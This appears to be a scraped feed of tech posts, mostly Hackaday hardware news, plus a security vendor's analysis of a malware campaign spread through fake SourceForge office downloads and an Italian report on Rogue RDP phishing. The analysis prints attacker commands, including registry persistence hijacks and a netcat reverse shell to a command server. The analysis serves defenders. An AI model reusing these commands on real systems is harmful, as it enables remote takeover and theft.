The UNIVAC originated with the Remington Rand company, which had bought Eckert-Mauchly Computer Corporation. Remington Rand later merged with the Sperry Corporation to become Sperry Rand. Eventually, the company reverted to the Sperry name before merging with Burroughs in 1986 to form UNISYS — a company that still exists today.

youtube.com/embed/fd7IiBOIwDM?…

hackaday.com/2025/04/08/the-co…

Even in 2025 there are still many applications for a simple Disk Operating System (DOS), whether this includes running legacy software (including MS-DOS games & Windows 3.x), or (embedded) systems running new software where the overhead of a full-fat Linux or BSD installation would be patently ridiculous.

This is where the FreeDOS project provides a modern, fully supported DOS, with the recent 1.4 release adding a whole range of features and updates to existing components like the FreeCOM command shell. This is the first stable release since 1.3 was released in 2022.

FreeDOS saw its first release in 1994 and has become the de facto replacement for MS-DOS — featuring many improvements to make it work well on modern hardware and a package manager to manage installed software much like on Linux & BSD. The new kernel didn’t quite make it into this release, but it and some other items will be available in the monthly test builds.

You can download the new 1.4 release here, with live & installer CD images, a USB installer and even a Floppy Edition available. System requirements include an (Intel) x86 CPU, a BIOS (or legacy UEFI mode), 640 kB of RAM and 20 MB of storage.

hackaday.com/2025/04/08/freedo…

[David] sent us a tip about a company in Belgium, Citronics, that is looking to turn old cellphones into single-board computers for embedded Linux applications. We think it’s a great idea, and have long lamented how many pocket supercomputers simply get tossed in the recycling stream, when they could be put to use in hacker projects. So far, it looks like Citronics only has a prototyping breakout board for the Fairphone 2, but it’s a promising idea.

One of the things that’s stopping us from re-using old phones, of course, is the lack of easy access to the peripherals. On the average phone, you’ve got one USB port and that’s it. The Citronics dev provides all sorts of connectivity: 4x USB 2.0, 1x Ethernet 10/100M, and a Raspberry Pi Header (UART, SPI, I2C, GPIO). At the same time, for better or worse, they’ve done away with the screen and its touch interface, and the camera too, but they seem to be keeping all of the RF capabilities.

The whole thing runs Linux, which means that this won’t work with every phone out there, but projects like PostmarketOS and others will certainly broaden the range of usable devices. And stripping off the camera and screen has the secondary advantages of removing the parts that get most easily broken and have the least support from custom Linux distros.

We wish we had more details about the specifics of the break-out boards, but we like the idea. How long before we see an open-source implementation of something similar? There are so many cheap used and broken cellphones out there that it’s certainly a worthwhile project!

hackaday.com/2025/04/08/turnin…

We know you’ve seen them: the time-lapses that show a 3D print coming together layer-by-layer without the extruder taking up half the frame. It takes a little extra work compared to just pointing a camera at the build plate, but it’s worth it to see your prints materialize like magic.

Usually these are done with a plugin for OctoPrint, but with all due respect to that phenomenal project, it’s a lot to get set up if you just want to take some pretty pictures. Which is why [Whopper Printing] put together the LayerLapse. This small PCB is designed to trigger your DSLR or mirrorless camera once its remotely-mounted hall effect sensor detects the presence of a magnet.
The remote hall effect sensor.
The idea is that you just need to stick a small magnet to your extruder, add a bit of extra G-code that will park it over the sensor at the end of each layer, and you’re good to go. There’s even a spare GPIO pin broken out should you want to trigger something else on each layer of your print. Admittedly we can’t think of anything else right now that would make sense, other than some other type of camera, but we’re sure some creative folks out there could put this feature to use.

Currently, [Whopper Printing] is selling the LayerLapse as a finished product, though it does sound like a kit version is in the works. There’s also instructions for building a DIY version of the hardware using your microcontroller of choice. Whether you buy or build the hardware, the firmware is available under the MIT license for your tinkering pleasure.

Being hardware hackers, we appreciate the stand-alone nature of this solution. But if you’re already controlling your printer through OctoPrint, you’re probably better off just setting up one of the available time-lapse plugins.

hackaday.com/2025/04/08/layerl…

Recently, we noticed a rather unique scheme for distributing malware that exploits SourceForge, a popular website providing software hosting, comparison, and distribution services. The site hosts numerous software projects, and anyone can upload theirs. One such project, officepackage, on the main website sourceforge.net, appears harmless enough, containing Microsoft Office add-ins copied from a legitimate GitHub project. The description and contents of officepackage provided below were also taken from GitHub.

Description of the “officepackage” project

Few know that projects created on sourceforge.net get a sourceforge.io domain name and web hosting services. Pages like that are well-indexed by search engines and appear in their search results.

Example of a search query and results containing officepackage.sourceforge.io

The project under investigation has been assigned the domain officepackage.sourceforge[.]io, but the page displayed when you go to that domain looks nothing like officepackage on sourceforge.net. Instead of the description copied from GitHub, the visitor is presented with an imposing list of office applications complete with version numbers and “Download” buttons.

The project as seen on the officepackage.sourcefoge.io domain

Hovering over one of the buttons reveals a seemingly legit URL in the browser status bar: https[:]//loading.sourceforge[.]io/download. It is easy to make the mistake of associating that URL with officepackage, as the buttons are on that project’s page. However, the loading.sourceforge.io domain suggests a different project on sourceforge.net, named loading.

URL associated with the “Download” button

Clicking the link redirects to a page with yet another “Download” button, this time in English.

Page for downloading the suspicious archive

Clicking that button finally downloads a roughly seven-megabyte archive named vinstaller.zip. This raises some red flags, as office applications are never that small, even when compressed.

The infection chain: from searching for office software to downloading an installer

The downloaded archive contains another password-protected archive, installer.zip, and a Readme.txt file with the password.

Contents of vinstaller.zip

Inside installer.zip is a file named installer.msi. This is a Windows Installer file that exceeds 700 megabytes. Apparently, the large size is intended to convince users they are looking at a genuine software installer. Attackers use the file pumping technique to inflate the file size by appending junk data. The file in question was padded with null bytes. After we stripped the junk bytes, its true size was 7 megabytes.

Contents of installer.zip

Running the installer creates several files, with two being of interest to us: UnRAR.exe (a console archive utility) and a password-protected archive named 51654.rar. The installer then executes an embedded Visual Basic script. Attackers have long distributed password-protected archives along with unpacking utilities, passing the password via the command line. However, this case has an intermediary step. The installer files lack an archive password. Instead, to continue the infection chain, the VB script runs a PowerShell interpreter to download and execute a batch file, confvk, from GitHub. This file contains the password for the RAR archive. It also unpacks malicious files and runs the next-stage script.

The infection chain: from launching the installer to downloading the confvk batch script

Here is a breakdown of how the batch script works. First, it checks for an existing infection by searching for the AutoIt interpreter at a specific path. If AutoIt is found, the script deletes itself and exits. If not, the script checks for processes associated with antivirus software, security solutions, virtual environments, and research tools. If it detects anything like that, it deletes itself.

If both checks pass, the script unpacks the RAR archive and runs two PowerShell scripts within its code.
"%ProgramData%\dist\UnRAR.exe" x -y -p147852369 "%ProgramData%\dist\51654.rar" "%ProgramData%\dist\"

Command to unpack the RAR archive executed by the batch file

One of the PowerShell scripts sends a message to a certain chat using the Telegram API. The message contains system information, the infected device’s external IP address and country, CPU name, operating system, installed antivirus, username, and computer name.

Code snippet from confvk with commands to unpack the malicious archive and run the Telegram file-sending script

The other PowerShell script downloads another batch file, confvz, to process the files that were extracted from the RAR archive.

Contents of the RAR archive

The contents of the archive can be seen in the screenshot above. Below is a summary of each file.

The confvz batch file creates three subdirectories at %ProgramData% and moves the unpacked archive files into those. The first subdirectory receives Input.exe and Icon.dll, the second gets another Input.exe copy with Kape.dll, and the third gets all netcat files. The batch file then creates ini.cmd and init.cmd batch scripts at %USERPROFILE%\Cookies\ to run the files it copied. These scripts execute Input.exe (the AutoIt interpreter), passing the paths to Icon.dll and Kape.dll (both containing compressed AutoIt scripts) as arguments.

Contents of the confvz batch file

Next, confvz generates keys in the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\*. These link to the ini.cmd and init.cmd batch files. The keys allow running files using shortened names. For example, the registry key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\install.exe"::"%USERPROFILE%\Cookies\ini.cmd
launches ini.cmd when running install.exe. Similarly, start.exe is registered as a link to init.exe, and Setup.exe links to the system utility %WINDIR%\System32\oobe\Setup.exe, normally launched during OS installation. We will revisit this utility later.

Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter without intermediate batch files.

Additionally, as a backup autostart method, confvz adds this registry key:
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe"::Debugger="%WINDIR%\System32\cmd.exe /c start start.exe"
This runs a debugger when MicrosoftEdgeUpdate.exe is started. The debugger is set to execute start.exe, which, based on the earlier registry keys, points to init.cmd.

Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds. While disabled by default in more recent Windows versions, WMIC still functions in older systems.

The handler executes the following command:
ShellExperienceHost.exe --ssl apap.app 445 -e cmd.exe
ShellExperienceHost.exe is the netcat executable from the malicious archive. The arguments above make the utility establish an encrypted connection with the C2 server apap[.]app on port 445 and launch a command-line interpreter with redirected input/output through that connection. This essentially creates a remote command line with apap[.]app:445 as the C2 server.

Finally, confvz creates a file:
%WINDIR%\Setup\Scripts\ErrorHandler.cmd
This is a custom script you can build in Windows to streamline troubleshooting during OS installation. If a critical error occurs, the %System32%\oobe\Setup.exe utility finds and executes this file. However, the attackers have found a way to exploit it for automatic startup. They achieve this by again using the operating system’s built-in WMIC utility to establish an event filter that triggers the handler every 300 seconds. The handler is specified as %WINDIR%\System32\cmd.exe /c start Setup.exe, while Setup.exe, according to the registry keys created earlier, references the utility %WINDIR%\System32\oobe\Setup.exe, which executes ErrorHandler.cmd upon launch. The ErrorHandler.cmd file contains a short PowerShell script that uses the Telegram API to retrieve and execute a text string. This is another remote command line, but its output is not sent anywhere.

The infection chain: from executing confvk to setting up all the auto-start methods

The key malicious actions in this campaign boil down to running two AutoIt scripts. Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker. ClipBanker is a malware family that replaces cryptocurrency wallet addresses in the clipboard with the attackers’ own. Users of crypto wallets typically copy addresses instead of typing them. If the device is infected with ClipBanker, the victim’s money will end up somewhere entirely unexpected.

Victims

The officepackage.sourceforge[.]io site has a Russian interface, suggesting a focus on Russian-speaking users. Our telemetry indicates that 90% of potential victims are in Russia, where 4,604 users encountered the scheme between early January and late March.

Takeaways

Distributing malware disguised as pirated software is anything but new. As users seek ways to download applications outside official sources, attackers offer their own. They keep looking for new ways to make their websites look legit. The scheme described here exploits SourceForge feature of creating a sourceforge.io subdomain for each sourceforge.net repository.

The persistence methods are worthy of note as well. Attackers secure access to an infected system through multiple methods, including unconventional ones. While the attack primarily targets cryptocurrency by deploying a miner and ClipBanker, the attackers could sell system access to more dangerous actors.

We advise users against downloading software from untrusted sources. If you are unable to obtain some software from official sources for any reason, remember that seeking alternative download options always carries higher security risks.

securelist.com/miner-clipbanke…

[JesseDarr] recently wrote in to tell us about their dynamic Arm for Robitc Mischief (dARM), a mostly 3D printed six degrees of freedom (6DOF) robotic arm that’s designed to be stronger and more capable than what we’ve seen so far from the DIY community.

The secret? Rather than using servos, dARM uses brushless DC (BLDC) motors paired with ODrive S1 controllers. He credits [James Bruton] and [Skyentific] (two names which regular Hackaday readers are likely familiar with) for introducing him to not only the ODrive controllers, but the robotics applications for BLDCs in the first place.

dARM uses eight ODrive controllers on a CAN bus, which ultimately connect up to a Raspberry Pi 4B with a RS485 CAN Hat. The controllers are connected to each other in a daisy chain using basic twisted pair wire, which simplifies the construction and maintenance of the modular arm.

As for the motors themselves, the arm uses three different types depending on where they are located, with three Eaglepower 8308 units for primary actuators, a pair of GB36-2 motors in the forearm, and finally a GM5208-24 for the gripper. Together, [JesseDarr] says the motors and gearboxes are strong enough to lift a 5 pound (2.2 kilogram) payload when extended in a horizontal position.

The project’s documentation includes assembly instructions for the printed parts, a complete Bill of Materials, and guidance on how to get the software environment setup on the Raspberry Pi. It’s not exactly a step-by-step manual, but it looks like there’s more than enough information here for anyone who’s serious about building a dARM for themselves.

If you’d like to start off by putting together something a bit easier, we’ve seen considerably less intimidating robotic arms that you might be interested in.

youtube.com/embed/Pv4tDsQZbRw?…

hackaday.com/2025/04/08/printe…

Il Google Threat Intelligence Group (GTIG) ha identificato una nuova ondata di attacchi informatici attribuendola a un gruppo denominato UNC5837.

La campagna, osservata a partire da ottobre 2024, adotta un approccio unico: l’invio di e-mail di phishing contenenti allegati in formato .rdp. Questi file, una volta aperti, avviano una connessione RDP dalla macchina della vittima a un server controllato dagli aggressori, senza mostrare i consueti banner di avviso per la sessione interattiva.

In questa sofisticata campagna di spionaggio, rivolta a istituzioni governative e militari europee, alcuni hacker ritenuti collegati ad attori statali russi hanno sfruttato una funzionalità meno nota del protocollo RDP (Remote Desktop Protocol) di Windows per infiltrarsi nei sistemi.

Le prove suggeriscono che questa campagna potrebbe aver comportato l’uso di uno strumento proxy RDP come PyRDP per automatizzare attività dannose come l’esfiltrazione di file e l’acquisizione degli appunti. Questa tecnica è stata precedentemente soprannominata “Rogue RDP”.
Esempio della campagna di phishing (fonte Google)
Le e-mail contenevano file .rdp firmati, con certificati SSL validi, per aggirare le misure di sicurezza che avrebbero avvisato gli utenti di potenziali rischi. Questi file sono configurati per mappare le risorse dal computer della vittima al server dell’attaccante.

La campagna ha probabilmente consentito agli aggressori di leggere le unità delle vittime, rubare file, catturare dati degli appunti (incluse le password) e ottenere variabili di ambiente delle vittime. Sebbene non abbiamo osservato l’esecuzione diretta di comandi sulle macchine delle vittime, gli aggressori potrebbero presentare applicazioni ingannevoli per phishing o ulteriori compromissioni.

L’obiettivo principale della campagna sembra essere lo spionaggio e il furto di file, sebbene la piena portata delle capacità dell’aggressore rimanga incerta. Questa campagna funge da duro promemoria dei rischi per la sicurezza associati alle oscure funzionalità RDP, sottolineando l’importanza della vigilanza e della difesa proattiva.

L'articolo RDP utilizzato dagli hacker russi per colpire le istituzioni governative e militari europee proviene da il blog della sicurezza informatica.

Should you travel around Europe, you may notice that things in France are ever so slightly different. Not necessarily better or worse, simply that the French prefer to plough their own furrow rather than importing cultural tends from their neighbors.

In the 1980s this was evident in their home computers, because as well as a Minitel terminal in your house, you could have an all-French machine plugged into your TV. [Retro Krazy] has just such a machine — it’s a Matra Hachette Alice 32, and its red plastic case hides hardware any of us would have been proud to own back in the day.

At first sight it appears superficially similar to a Sinclair Spectrum, with its BASIC keywords next to the keys. But under that slightly calculator style AZERTY keyboard is an entirely different architecture, a Motorola 6803. The first Alice computer was a clone of a Radio Shack model, and while this one has no compatibility with its predecessor it retains some silicon choices. On the back are a series of DIN sockets, one for a SCART adapter, and more for serial connectivity and a cassette deck. The overall impression is of a well-engineered machine, even if that red color is a little garish.

The Alice hasn’t appeared here on its own before, but we have taken a look at French retrocomputers here in the past.

youtube.com/embed/_Pr--TXhnX4?…

hackaday.com/2025/04/07/the-19…

We’ve seen tons of projects lately using the ESP32-C3, and for good reason. The microcontroller has a lot to offer, and the current crop of tiny dev boards sporting it make adding a lot of compute power to even the smallest projects dead easy. Not so nice, though, is the poor WiFi performance of some of these boards, which [Peter Neufeld] addresses with this quick and easy antenna.

There are currently a lot of variations of the ESP32-C3 out there, sometimes available for a buck a piece from the usual suspects. Designs vary, but a lot of them seem to sport a CA-C03 ceramic chip antenna at one end of the board to save space. Unfortunately, the lack of free space around the antenna makes for poor RF performance. [Peter]’s solution is a simple antenna made from a 31-mm length of silver wire. One end of the wire is formed into a loop by wrapping it around a 5-mm drill bit and bending it perpendicular to the remaining tail. The loop is then opened up a bit so it can bridge the length of the ceramic chip antenna and then soldered across it. That’s all it takes to vastly improve performance as measured by [Peter]’s custom RSSI logger — anywhere from 6 to 10 dBm better. You don’t even need to remove the OEM antenna.

The video below, by [Circuit Helper], picks up on [Peter]’s work and puts several antenna variants to further testing. He gets similarly dramatic results, with 20 dBm improvement in some cases. He does note that the size of the antenna can be a detriment to a project that needs a really compact MCU and tries coiling up the antenna, with limited success. He also did a little testing to come up with an optimal length of 34 mm for the main element of the antenna.

There seems to be a lot of room for experimentation here. We wonder how mounting the antenna with the loop perpendicular to the board and the main element sticking out lengthwise would work. We’d love to hear about your experiments, so make sure to ping us with your findings.

youtube.com/embed/UHTdhCrSA3g?…

hackaday.com/2025/04/07/simple…

The advantage of a radio-controlled clock that receives the time signal from WWVB is that you never have to set it again. Whether it’s a little digital job on your desk, or some big analog wall clock that’s hard to access, they’ll all adjust themselves as necessary to keep perfect time. But what if the receiver conks out on you?

Well, you’d still have a clock. But you’d have to set it manually like some kind of Neanderthal. That wasn’t acceptable to [jim11662418], so after he yanked the misbehaving WWVB receiver from his clock, he decided to replace it with an ESP8266 that could connect to the Internet and get the current time via Network Time Protocol (NTP).

This modification was made all the easier by the fact that the WWVB receiver was its own PCB, connected to the clock’s main board by three wires: one for the clock signal, another that gets pulled low when the clock wants to turn on the receiver (usually these clocks only update themselves once a day), and of course, ground. It was simply a matter of connecting the ESP8266 dev board up to the two digital lines and writing some code that would mimic the responses from the original receiver.

If you take a look through the provided source code, a comment explains that the WWVB signal is recreated based on the official documentation from the National Institute of Standards and Technology (NIST) website. There are functions in the code to bang out the 500 ms “one” and 200 ms “zero” bits, and once the microcontroller has picked up the correct time from the Internet, they’re called in quick succession to build the appropriate time signal. As such, this code should work on any clock that has an external WWVB receiver like this, but as always, your mileage may vary.

This is a very clean hack, but if you wanted to pull off something similar without having to gut all the clocks in your house, we’ve seen a WWVB simulator that can broadcast an NTP-backed time signal to anything listening nearby.

hackaday.com/2025/04/07/atomic…

We’ve got a love-hate relationship with discount tool outlet Harbor Freight: we hate that we love it so much. Apparently, [James Clough] is of much the same opinion, at least now that he’s looked into the quality of their outlet strips and found it somewhat wanting.

The outlet strips in question are Harbor Freight’s four-foot-long, twelve-outlet strips, three of which are visible from where this is being written. [James] has a bunch of them too, but when he noticed an intermittent ground connection while using an outlet tester, he channeled his inner [Big Clive] and tore one of the $20 strips to bits. The problem appears to be poor quality of the contacts within each outlet, which don’t have enough spring pre-load to maintain connection with the ground pin on the plug when it’s wiggled around. Actually, the contacts for the hot and neutral don’t look all that trustworthy either, and the wiring between the outlets is pretty sketchy too. The video below shows the horrors within.

What’s to be done about this state of affairs? That’s up to you, of course. We performed the same test on all our outlets and the ground connections all seemed solid. So maybe [James] just got a bad batch, but he’s still in the market for better-quality strips. That’s going to cost him, though, since similar strips with better outlets are about four times the price of the Harbor Freight units. We did find a similar strip at Home Depot for about twice the price of the HF units, but we can’t vouch for the quality. As always, caveat emptor.

youtube.com/embed/z8YdOG9biKU?…

Thanks to [cliff claven] for the tip.

hackaday.com/2025/04/07/buyer-…